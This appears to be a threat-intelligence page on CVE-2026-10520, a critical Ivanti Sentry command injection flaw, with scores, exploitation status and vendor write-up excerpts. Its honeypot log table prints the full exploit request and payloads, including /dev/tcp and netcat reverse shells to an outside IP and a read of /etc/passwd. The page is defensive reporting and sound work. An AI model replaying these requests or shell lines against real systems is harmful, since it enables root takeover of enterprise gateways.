Vulnerability detail
Enriched intelligence for a single CVE
Critical
CVE-2026-10520
PUBLISHED
An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to...
- Vendor: ivanti
- Product: Sentry
- Published: Jun 09, 2026
- EPSS: 0.2% · 44% pctl
Description
An OS Command Injection vulnerability in Ivanti Sentry before the R10.5.2, R10.6.2 and R10.7.1 versions allows a remote unauthenticated user to achieve root-level remote code execution.
Weaknesses (CWE)
- Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
CVSS scores
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Exploitation status
Exploited in the wild
Recorded 2026-06-10 09:50:00 UTC · Defused Cyber
Proof of concept available
Recorded 2026-06-10 01:00:00 UTC
Honeypot observations
In-the-wild exploitation detected by KEVIntel private honeypots. Honeypot software may differ from the CVE vendor/product when attackers spray exploits across targets.
- Unique attackers (24h): 3
- Unique attackers (7d): 3
- Honeypots hit (24h): 0
- First seen (24h window): —
- Last seen (24h window): —
Showing observations from the last 30 days.
| Attack Time | Attacker IP | Honeypot Info | Request | Payload Used |
|---|---|---|---|---|
| 2026-06-10 15:08 UTC | 185.209.199.106 | 🇺🇸 Ivanti Sentry | `POST /mics/api/v2/sentry/mics-config/handleMessage` (python-requests/2.32.5) | `message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>cat /etc/passwd</reqandres></commandexec>` |
| 2026-06-10 15:07 UTC | 185.209.199.106 | 🇺🇸 Ivanti Sentry | `POST /mics/api/v2/sentry/mics-config/handleMessage` (python-requests/2.32.5) | `message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>sh -i >& /dev/tcp/222.170.120.232/2373 0>&1</reqandres></commandexec>` |
| 2026-06-10 15:07 UTC | 185.209.199.106 | 🇺🇸 Ivanti Sentry | `POST /mics/api/v2/sentry/mics-config/handleMessage` (python-requests/2.32.5) | `message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>rm /tmp/f;mkfifo /tmp/f;cat /tmp/f\|sh -i 2>&1\|nc 222.170.120.232 2373 >/tmp/f</reqandres></commandexec>` |
| 2026-06-10 15:02 UTC | 185.209.199.106 | 🇺🇸 Ivanti Sentry | `POST /mics/api/v2/sentry/mics-config/handleMessage` | `message=execute system /configuration/system/commandexec <commandexec><index>1</index><reqandres>id</reqandres></commandexec>` |
Known exploited vulnerability sources
Catalogues that list this CVE as a known exploited vulnerability.
| Source | Added |
|---|---|
| Defused Cyber First | 2026-06-10 09:50 UTC |
| KEVIntel | 2026-06-10 15:02 UTC |
Recent mentions
Rapid7 · Jun 10, 2026
Overview

On June 9, 2026, Ivanti published a security advisory for two critical vulnerabilities affecting Ivanti Sentry (formerly known as MobileIron Sentry), which per the vendor website is an “in-line gateway that manages, encrypts, and secures traffic between the mobile device and back-end enterprise systems”. The most severe issue, CVE-2026-10520, is an OS command injection vulnerability with a CVSS score of 10.0 that allows a remote unauthenticated attacker to achieve remote code execution (RCE) with root privileges. The second vulnerability, CVE-2026-10523, is an authentication bypass vulnerability with a CVSS score of 9.9 that allows a remote unauthenticated attacker to create arbitrary administrative accounts and obtain full administrative access. Ivanti has stated that they are not aware of any customers being exploited by either of these vulnerabilities at the time of disclosure.

| CVE | CVSSv3.1 | CWE |
|---|---|---|
| CVE-2026-10520 | 10.0 (Critical) | OS Command Injection (CWE-78) |
| CVE-2026-10523 | 9.9 (Critical) | Authentication Bypass Using an Alternate Path or Channel (CWE-288) |

On June 10, 2026, watchTowr published a technical analysis of CVE-2026-10520 that includes a proof-of-concept (PoC) exploit for unauthenticated RCE. Given the trivial nature of exploitation and the availability of a public PoC, exploitation in-the-wild is likely to begin. Ivanti Sentry has featured on the CISA KEV list twice in the past (for the vulnerabilities CVE-2023-38035 and CVE-2020-15505), so we know threat actors will likely target this product. Organizations running affected versions of Ivanti Sentry should remediate these issues on an urgent basis before exploitation in-the-wild begins.

Technical overview for CVE-2026-10520

Based upon the technical analysis by watchTowr, CVE-2026-10520 resides in the ConfigServiceController class within the Sentry web application, which is accessible via a POST request to the unauthenticated endpoint /mics/api/v2/sentry/mics-config/handleMessage.

The handleMessage endpoint...
Watchtower Labs · Jun 10, 2026
Today, Ivanti published an advisory.

“No way?” we hear you say. "Yes way!" a random dog screams back at you, across the street.

Today’s rare advisory outlines two vulnerabilities in Ivanti’s Sentry product, appealing directly to our inner desire for sophisticated server-side,
Potential proof of concepts
These PoCs are unverified and could contain malware. Use at your own risk.
public · Created 2026-06-10 01:00:00 UTC
Timeline
- CVE ID Reserved
- CVE Published to Public
- Proof of Concept Exploit Available
- Added to KEVIntel
- KEV confirmed by KEVIntel